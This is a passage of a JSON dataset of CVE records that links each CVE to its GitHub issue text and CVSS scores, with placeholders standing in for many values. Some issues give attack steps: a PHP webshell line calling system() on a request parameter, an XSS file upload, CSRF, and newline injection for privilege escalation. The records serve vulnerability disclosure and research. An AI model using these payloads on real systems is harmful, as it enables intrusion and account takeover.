        "description": "SEGV src/njs_value.h in njs_set_number. Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG APITAG Ubuntu SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG function APITAG { var arr NUMBERTAG new APITAG var arr NUMBERTAG APITAG = arr NUMBERTAG ar arr_fill = APITAG var func = ERRORTAG ; } APITAG Stack dump APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG e3b NUMBERTAG caa8 (pc NUMBERTAG e3b1e NUMBERTAG bp NUMBERTAG fffe5a NUMBERTAG sp NUMBERTAG fffe5a NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG e3b1e NUMBERTAG in njs_set_number src/njs_value.h NUMBERTAG e3b1e NUMBERTAG in njs_typed_array_set_value APITAG NUMBERTAG e3b0d7ba6 in njs_value_property_set src/njs_value.c NUMBERTAG e3b NUMBERTAG af in njs_value_property_i NUMBERTAG set APITAG NUMBERTAG e3b NUMBERTAG af in njs_array_prototype_fill APITAG NUMBERTAG e3b NUMBERTAG d NUMBERTAG c in njs_function_native_call APITAG NUMBERTAG e3b0e NUMBERTAG fb in njs_vmcode_interpreter APITAG NUMBERTAG e3b NUMBERTAG caba in njs_function_lambda_call APITAG NUMBERTAG e3b0e NUMBERTAG fb in njs_vmcode_interpreter APITAG NUMBERTAG e3b0dd0ba in njs_vm_start APITAG NUMBERTAG e3b0c NUMBERTAG f8 in njs_process_script APITAG NUMBERTAG e3b0c6ebf in njs_process_file APITAG NUMBERTAG e3b0c NUMBERTAG f in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG e3b0c3c4d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV src/njs_value.h in njs_set_number NUMBERTAG ABORTING Credit xmzyshypnc( APITAG and P1umer( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-30517",
        "Issue_Url_old": "https://github.com/moxi624/mogu_blog_v2/issues/65",
        "Issue_Url_new": "https://github.com/moxi624/mogu_blog_v2/issues/65",
        "Repo_new": "moxi624/mogu_blog_v2",
        "Issue_Created_At": "2022-05-08T11:03:25Z",
        "description": "Mogu blog has a vulnerability to upload arbitrary files. Using mogu NUMBERTAG mogu NUMBERTAG to log in the Mogu blog. FILETAG FILETAG FILETAG Choose User Center > User Avatar > Image FILETAG FILETAG At this point, use the burp suite to capture the request packet. Use the Repeater module in APITAG Try to change the file contents in the request package to the XSS payload and try to change the file name to the HTML suffix. You can see the successful upload and the file path in the response package. FILETAG Open your browser to access the HTML file you just uploaded FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-30708",
        "Issue_Url_old": "https://github.com/webmin/webmin/issues/1635",
        "Issue_Url_new": "https://github.com/webmin/webmin/issues/1635",
        "Repo_new": "webmin/webmin",
        "Issue_Created_At": "2022-05-14T16:41:01Z",
        "description": "RCE and privesc on safe user. We were RCE hunting on live stream, sorry for the poc. URLTAG URLTAG Please patch.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-30860",
        "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/23",
        "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/23",
        "Repo_new": "fudforum/fudforum",
        "Issue_Created_At": "2022-05-10T07:54:26Z",
        "description": "Remote code execution bug. Remote code execution with File Administration System feature in Admin Control Panel Site Affected Version NUMBERTAG Demo installation: FILETAG Steps to reproduce the bug NUMBERTAG go to FILETAG and login with admin account NUMBERTAG go to Admin Control panel and access to URLTAG NUMBERTAG Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory APITAG payload: APITAG \"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \" APITAG \"; die NUMBERTAG Access to webshell and get remote execution code. Example : URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-30861",
        "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/24",
        "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/24",
        "Repo_new": "fudforum/fudforum",
        "Issue_Created_At": "2022-05-10T09:38:47Z",
        "description": "Cross Site Scripting. What is XSS Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Affected Version NUMBERTAG Demo installation: FILETAG Reproduce bug: Step NUMBERTAG Login with admin account and go to the Admin Control Panel. Step NUMBERTAG In Categories & Forums, use Forum Manager to add new Forum to Private Forums. Step NUMBERTAG Inject XSS payload to Forum Name field and complete Add Forum XSS payload : a APITAG Step NUMBERTAG Go back to FILETAG > XSS trigger Impact of XSS: If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-30877",
        "Issue_Url_old": "https://github.com/OrkoHunter/keep/issues/85",
        "Issue_Url_new": "https://github.com/orkohunter/keep/issues/85",
        "Repo_new": "orkohunter/keep",
        "Issue_Created_At": "2022-05-11T11:13:20Z",
        "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install keep NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30882",
        "Issue_Url_old": "https://github.com/egeback/pyanxdns/issues/1",
        "Issue_Url_new": "https://github.com/egeback/pyanxdns/issues/1",
        "Repo_new": "egeback/pyanxdns",
        "Issue_Created_At": "2022-05-14T02:36:51Z",
        "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install pyanxdns NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30885",
        "Issue_Url_old": "https://github.com/esdc-esac-esa-int/pyesasky/issues/39",
        "Issue_Url_new": "https://github.com/esdc-esac-esa-int/pyesasky/issues/39",
        "Repo_new": "esdc-esac-esa-int/pyesasky",
        "Issue_Created_At": "2022-05-14T07:41:14Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install pyesasky NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30898",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/37",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/37",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-05-12T08:31:17Z",
        "description": "Cross site request forgery vulnerability exists in Cscms music portal system NUMBERTAG details In cscms NUMBERTAG A problem was found in NUMBERTAG Cross site request forgery (CSRF) vulnerability in PATHTAG allow remote attackers to change Trigger condition: the administrator clicks a malicious link Cause of vulnerability: We can find that this script has no anti CSRF mechanism. Exploit: Login administrator click URL: FILETAG csrf. html\uff1a CODETAG PATHTAG FILETAG administrator Click FILETAG success FILETAG The password has been successfully changed to NUMBERTAG FILETAG Repair method: Join the random token check",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-30974",
        "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/162",
        "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/162",
        "Repo_new": "ccxvii/mujs",
        "Issue_Created_At": "2022-05-15T11:55:53Z",
        "description": "FILETAG Credit FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-30975",
        "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/161",
        "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/161",
        "Repo_new": "ccxvii/mujs",
        "Issue_Created_At": "2022-05-13T14:42:02Z",
        "description": "FILETAG Credit FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-30976",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2179",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2179",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-04-25T14:26:20Z",
        "description": "FILETAG FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31015",
        "Issue_Url_old": "https://github.com/Pylons/waitress/issues/374",
        "Issue_Url_new": "https://github.com/pylons/waitress/issues/374",
        "Repo_new": "pylons/waitress",
        "Issue_Created_At": "2022-04-11T16:47:59Z",
        "description": "Possible race condition leading to the main loop dying?. I just might be wrong because if this indeed a race condition it should be breaking more things. Anyway, I got this exception (line numbers might be wrong due to debug statements): ERRORTAG This error was extremely rare but since I was getting it while running tests I could just run a lot of them until one failed, which I did, and I think the problem is a follows NUMBERTAG First, thread APITAG that the app I'm testing is launching, one that runs waitress server, assembles the descriptor lists for select : URLTAG NUMBERTAG Then, thread APITAG deletes one of the channels, in my case it was ERRORTAG , and immediately closes the socket: URLTAG Stack of APITAG at the moment: ERRORTAG NUMBERTAG Then, thread APITAG is trying to see if the file descriptor of the socked closed above is writable, which leads to the the exception above: URLTAG Python NUMBERTAG waitress NUMBERTAG Ubuntu NUMBERTAG LTS focal @ WSL2",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-31051",
        "Issue_Url_old": "https://github.com/semantic-release/semantic-release/issues/2449",
        "Issue_Url_new": "https://github.com/semantic-release/semantic-release/issues/2449",
        "Repo_new": "semantic-release/semantic-release",
        "Issue_Created_At": "2022-06-03T10:27:20Z",
        "description": "Credentials are revealed in log. Current behavior Credentials are revealed in the logs (see example below): APITAG Expected behavior Credentials should be hidden (see example below); APITAG Environment semantic release version NUMBERTAG CI environment: APITAG Plugins used: commit analyzer, release notes generator, changelog, exec, git semantic release configuration: CODETAG CI logs: see above for the relevant log entry We are using semantic release in combination with Bitbucket Server. Credentials are passed via environment variable BITBUCKET_TOKEN_BASIC_AUTH. AFAIK this should be the relevant line that reveals (logs) the sensitive data: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31054",
        "Issue_Url_old": "https://github.com/argoproj/argo-events/issues/1946",
        "Issue_Url_new": "https://github.com/argoproj/argo-events/issues/1946",
        "Repo_new": "argoproj/argo-events",
        "Issue_Created_At": "2022-05-10T17:48:31Z",
        "description": "8 Uses of deprecated API can be used to cause APITAG in user facing endpoints. APITAG APITAG APITAG Severity | Medium | Difficulty | Medium Target | \u00a0 APITAG APITAG APITAG APITAG Several APITAG APITAG APITAG APITAG APITAG endpoints make use of the deprecated APITAG APITAG APITAG APITAG APITAG . APITAG APITAG APITAG APITAG APITAG reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to crash it and cause denial of service. APITAG APITAG APITAG APITAG APITAG Eventsources susceptible to an out of memory denial of service attack: APITAG APITAG APITAG APITAG APITAG APITAG APITAG AWS SNS APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Bitbucket APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Bitbucket Server APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Gitlab APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Slack APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Storagegrid APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Webhook APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Note that the Stripe Event Source uses APITAG APITAG APITAG APITAG APITAG but limits the size of the request body: APITAG APITAG APITAG URLTAG APITAG APITAG APITAG APITAG APITAG APITAG Since APITAG APITAG io/ioutil APITAG APITAG has ceased maintenance we recommend discontinuing all use of this package. APITAG APITAG Severity Medium Difficulty Medium Target Several APITAG endpoints make use of the deprecated APITAG APITAG reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to crash it and cause denial of service. Eventsources susceptible to an out of memory denial of service attack: AWS SNS URLTAG Bitbucket URLTAG Bitbucket Server Gitlab URLTAG Slack URLTAG Storagegrid URLTAG Webhook URLTAG Note that the Stripe Event Source uses APITAG but limits the size of the request body: URLTAG Since io/ioutil has ceased maintenance we recommend discontinuing all use of this package.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31103",
        "Issue_Url_old": "https://github.com/mat-sz/react-letter/issues/17",
        "Issue_Url_new": "https://github.com/mat-sz/react-letter/issues/17",
        "Repo_new": "mat-sz/react-letter",
        "Issue_Created_At": "2022-06-22T03:19:11Z",
        "description": "NUMBERTAG cpu cost and lagging. In production I have issue with this html. If use APITAG there is no error, but if use react letter CPU will hold on NUMBERTAG and the browser will be unresponded Please check FILETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31110",
        "Issue_Url_old": "https://github.com/DIYgod/RSSHub/issues/10045",
        "Issue_Url_new": "https://github.com/diygod/rsshub/issues/10045",
        "Repo_new": "diygod/rsshub",
        "Issue_Created_At": "2022-06-26T18:02:17Z",
        "description": "Vulnerability Report Disclosure: APITAG Catastrophic Backtracking in User supplied Regular Expression. Routes routes NOROUTE Full routes fullroutes NOROUTE Related documentation NOROUTE What is expected? The vulnerability has been fixed (refer to the [security advisory URLTAG . According to the consultation with MENTIONTAG this is a complete disclosure of the vulnerability report, disclosed NUMBERTAG hours after the fix commit. FILETAG \u7b80\u8981\u7684\u7b80\u4f53\u4e2d\u6587\u7ffb\u8bd1\u9644\u5728\u4e0b\u4e00\u6761\u56de\u590d\u3002 Vulnerability Report APITAG Regular expression Denial of Service APITAG Catastrophic Backtracking in User supplied Regular Expression Author: Rongrong APITAG POC APITAG reporting to the repository owner, the vulnerability has been fixed (refer to the security advisory URLTAG . To reproduce the vulnerability, a version before APITAG (inclusive) is needed NUMBERTAG Follow the FILETAG to deploy an APITAG instance in any method (except Vercel or GAE NUMBERTAG APITAG NUMBERTAG The instance is now unresponsive to any request APITAG of Service NUMBERTAG Monitor the CPU usage of the process APITAG . It is now always occupying a whole CPU core. It can last for at least several hours. EXP APITAG is an APITAG instance. APITAG can be nearly any \"route\" of APITAG filter , APITAG , APITAG , APITAG , filterout , APITAG , APITAG , and APITAG are all so called parameters of APITAG which can be supplied in the URI query. These parameters accept user supplied regular expressions with unconditional trust, then call APITAG to perform regular expression matches. All of these parameters are vulnerable. APITAG is the URL encoded form of the regular expression / APITAG /. The POC shows a catastrophic backtracking vulnerable regular expression specially designed for any HTML. But most catastrophic backtracking vulnerable regular expression may be able to construct an effective APITAG attack (refer to the APITAG back\" chapter for more details). Once catastrophic backtracking occurs, APITAG can take more than several hours to finish. APITAG is no timeout enforced, causing the APITAG attack to become \"zero cost\": attack once, down for hours. APITAG On multi core servers, the APITAG attack can probably only affect the APITAG instance itself; while APITAG on single core servers, especially VPS NUMBERTAG it can be a disaster. APITAG The component cannot be disabled. APITAG APITAG instance is vulnerable \"out of box\" APITAG unless additional access control is applied. If an external watchdog or timeout is enforced (e.g. Vercel, GAE), the downtime of each effective attack can be limited. However, the instance must be terminated first in order to resume it, so the attack cost is still too low NUMBERTAG Most VPS providers take the advantage of a technology called \"CPU credits\". If a VPS has a high CPU load continuously, it can possibly consume all remaining CPU credits, causing the VPS provider to limit the performance to a fairly low level. Even if the high load ends, it can take at least several hours before there are enough CPU credits to make the performance resume. Vulnerable version Since Git hash APITAG Pull Request NUMBERTAG on APITAG which was merge on Feb NUMBERTAG months ago). APITAG in APITAG Condition to be vulnerable Unless additional access control is applied. If an external watchdog or timeout is enforced, the downtime can be limited but the instance is still vulnerable. Vulnerability grade High. Possible fix Either NUMBERTAG Drop the regular expression match feature completely and roll back to string match NUMBERTAG Enforce additional permission check when accepting user supplied regular expressions NUMBERTAG Migrate to a backtracking free regular expression engine NUMBERTAG not really NUMBERTAG a \"fix\") Enforce a timeout when performing a regular expression match NUMBERTAG not really NUMBERTAG a \"fix\") Disable the feature by default and require each instance maintainer to manually enable it NUMBERTAG The attack cost is still too low NUMBERTAG Still vulnerable if manually enabled and matching the \"condition to be vulnerable\". Timeline Considering the fix of the vulnerability is simple, I prefer a NUMBERTAG days timeline (UTC). Jun NUMBERTAG APITAG NUMBERTAG ulnerability found. Vulnerability reported. Jul NUMBERTAG APITAG NUMBERTAG If the email to EMAILTAG gets no response, I will immediately open an issue in the APITAG repository URLTAG , only informing maintainers there is a APITAG vulnerability without disclosing any vulnerability detail. Jun NUMBERTAG Jul NUMBERTAG APITAG NUMBERTAG Day NUMBERTAG If a fix is committed and pushed to the APITAG repository during this period, I will wait for NUMBERTAG hours in order that maintainers can disclose a security advisory URLTAG on APITAG No matter whether the security advisory has been disclosed or not, once the NUMBERTAG hour deadline is exceeded, I will immediately disclose the full report NUMBERTAG by opening an [issue in the APITAG repository URLTAG . Jul NUMBERTAG Jul NUMBERTAG APITAG NUMBERTAG Day NUMBERTAG Once a fix is committed and pushed to the APITAG repository during this period, I will immediately disclose the full report by opening an issue in the APITAG repository. Jul NUMBERTAG APITAG NUMBERTAG If no fix was committed and pushed to the APITAG repository during the previous two periods, I will immediately disclose the full report by opening an issue in the APITAG repository. Additional conditions Maintainers may ask me to disclose the full report before exceeding the NUMBERTAG hour deadline. Maintainers may consult with me to determine a new timeline, but that consultation must be disclosed along with the full report. If being replied \"won't fix\" or \"not a vulnerability\", I will immediately disclose the full report along with the reply by opening an issue in the APITAG repository. I reserve the right to apply for a CVE ID NUMBERTAG What you are reading. Timeline (in reality) Jun NUMBERTAG UTC NUMBERTAG h) Vulnerability reported. Jun NUMBERTAG UTC NUMBERTAG h) Vulnerability fixed. Replace the regular expression engine to a backtracking free one. Git hash: APITAG Jun NUMBERTAG UTC NUMBERTAG h) The fix was confirmed to be effective. Jun NUMBERTAG UTC NUMBERTAG h) The [security advisory URLTAG was published. Jun NUMBERTAG UTC NUMBERTAG h) Two commits \"for backward compatibility\" opened up the attack surface again by allowing instance maintainers to switch back to the vulnerable regular expression engine. Git hash: APITAG Pull request NUMBERTAG Git hash: APITAG Pull request NUMBERTAG Since they were created by a maintainer APITAG and approved by the repository owner APITAG I choose not to consider it as a vulnerability but document it here for warning (refer to the next chapter). Jun NUMBERTAG UTC NUMBERTAG h) The full report was able to be disclosed. Look back APITAG A APITAG attack is usually severe but cost less, \"defeating the strong with little effort\". APITAG Carelessness and the over trust in the regular expression engine requiring backtracking are the root causes of a APITAG vulnerability, while the common immediate causes are NUMBERTAG A regular expression engine requiring backtracking, and NUMBERTAG A catastrophic backtracking vulnerable regular expression, and NUMBERTAG A user supplied malicious strings. APITAG vulnerabilities are not very common since there must be a catastrophic backtracking vulnerable regular expression, which is usually written by programmers and out of the control of end users. APITAG in this vulnerability of APITAG things are different: both the regular expression and the string can be user supplied. APITAG In the POC, I merely showed how to supply a vulnerable regular expression. So how to understand why the string can also be user supplied? A fact is that some \"routes\" (e.g. APITAG ) grab posts from social media, resulting in anyone being able to post malicious strings and request APITAG to grab them. An experienced attacker may merely construct a vulnerable regular expression specially designed for some strings just like the one I have demonstrated. While an inexperienced attacker can easily use known combinations of vulnerable regular expressions and malicious strings. As a result, APITAG everyone who knows what catastrophic backtracking is can probably construct an effective attack APITAG . The fix adopts an alternative regular expression engine ( APITAG ) which is backtracking free. It is quite simple, but effective. It shows a nice example with functionality and security balanced. However, as mentioned, two commits (refer to the previous chapter) have opened up the attack surface again in certain conditions. Those commits re empower instance maintainers to switch back to the vulnerable regular expression engine, the vanilla built in APITAG one ( APITAG ). To be responsible, I warn instance maintainers again not to switch back to APITAG unless: Additional access control URLTAG is applied, or Your instance does not expose to the Internet, or You understand what are you doing exactly and do not care about APITAG attacks. Revisions Re NUMBERTAG Initial report. Re NUMBERTAG Document the chosen fix in the chapter APITAG fix\". Correct some wording and statements. Add two new chapters: APITAG (in reality)\" and APITAG back\". Re NUMBERTAG Minor revision. Document two commits opening up the attack surface again in certain conditions. What is actually happening? N/A Deployment information APITAG demo ( FILETAG Deployment information (for self hosted) N/A Additional info APITAG This is not a duplicated issue X] I have searched [existing issues URLTAG to ensure this bug has not already been reported",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31259",
        "Issue_Url_old": "https://github.com/beego/beego/issues/4946",
        "Issue_Url_new": "https://github.com/beego/beego/issues/4946",
        "Repo_new": "beego/beego",
        "Issue_Created_At": "2022-05-17T06:42:50Z",
        "description": "router PATHTAG can match PATHTAG URLTAG This modification is still not sufficient\uff0cfor router PATHTAG url like PATHTAG can also be matched FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31267",
        "Issue_Url_old": "https://github.com/gitblit/gitblit/issues/1410",
        "Issue_Url_new": "https://github.com/gitblit-org/gitblit/issues/1410",
        "Repo_new": "gitblit-org/gitblit",
        "Issue_Created_At": "2022-02-28T08:06:52Z",
        "description": "A user privilege elevation vulnerability in the latest version of gitblit. Hello, I tried to contact the developers of your product but did not get a response, so I decided to raise the vulnerability to you in the issue, hoping that you can fix it as soon as possible to avoid a wider impact of the vulnerability. Principle of the vulnerability Gitblit uses file storage to manage user information, passwords, account types, and permissions. When a user with low privileges modifies their information, if they use line breaks and space characters, they can create new users or assign higher higher privileges. The relevant code logic is in the write function of APITAG . The reason for the problem is that gitblit does not do a checksum on the characters entered by the user, and malicious characters are printed directly in the file, causing gitblit to parse the file incorrectly when reading it. The location where users are saved is in APITAG The default APITAG is as follows. APITAG The user name is admin, the password is admin, and the user's permissions are admin permissions, and the file will change as the user logs in. After logging in once the file reads ERRORTAG If there is a new user, a new user will be created below the user, and which will be accompanied by the user's APITAG information, if the attacker in the modification of their own APITAG the APITAG set to APITAG ,you can modify the permissions of their own user to admin. Vulnerability recurrence NUMBERTAG The attacker has an account with no privileges, username test , password APITAG , and privileges None , and the current APITAG is. ERRORTAG NUMBERTAG After logging in, click on Profile APITAG in order FILETAG Turn on burpsuite's blocking feature, click Save, and block the request with burpsuite NUMBERTAG In burpsuite, make changes to the request. FILETAG Modify the value of APITAG to APITAG after url encoding. The APITAG at the end of the payload is to avoid the impact of the original role = \" none\". The encoding can be done using burpsuite's Decode function FILETAG NUMBERTAG After modifying the request body and sending the request, APITAG changes to the following state. FILETAG You can see that the test user has become admin privileges. Refreshing the page, at this point the test user has full access to gitblit, and can see all Git repositories and manage all users and teams FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31282",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/708",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/708",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2022-05-08T16:25:44Z",
        "description": "SEGV on unknown address NUMBERTAG in PATHTAG SUMMARY: APITAG SEGV on unknown address NUMBERTAG in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31285",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/702",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/702",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2022-05-08T09:35:50Z",
        "description": "allocator is out of memory in PATHTAG SUMMARY: APITAG allocator is out of memory in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31287",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/703",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/703",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2022-05-08T09:38:48Z",
        "description": "requested allocation size NUMBERTAG fffffffffffffffd in PATHTAG SUMMARY: APITAG requested allocation size NUMBERTAG fffffffffffffffd in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31302",
        "Issue_Url_old": "https://github.com/maccmspro/maccms8/issues/1",
        "Issue_Url_new": "https://github.com/maccmspro/maccms8/issues/1",
        "Repo_new": "maccmspro/maccms8",
        "Issue_Created_At": "2022-05-17T01:14:56Z",
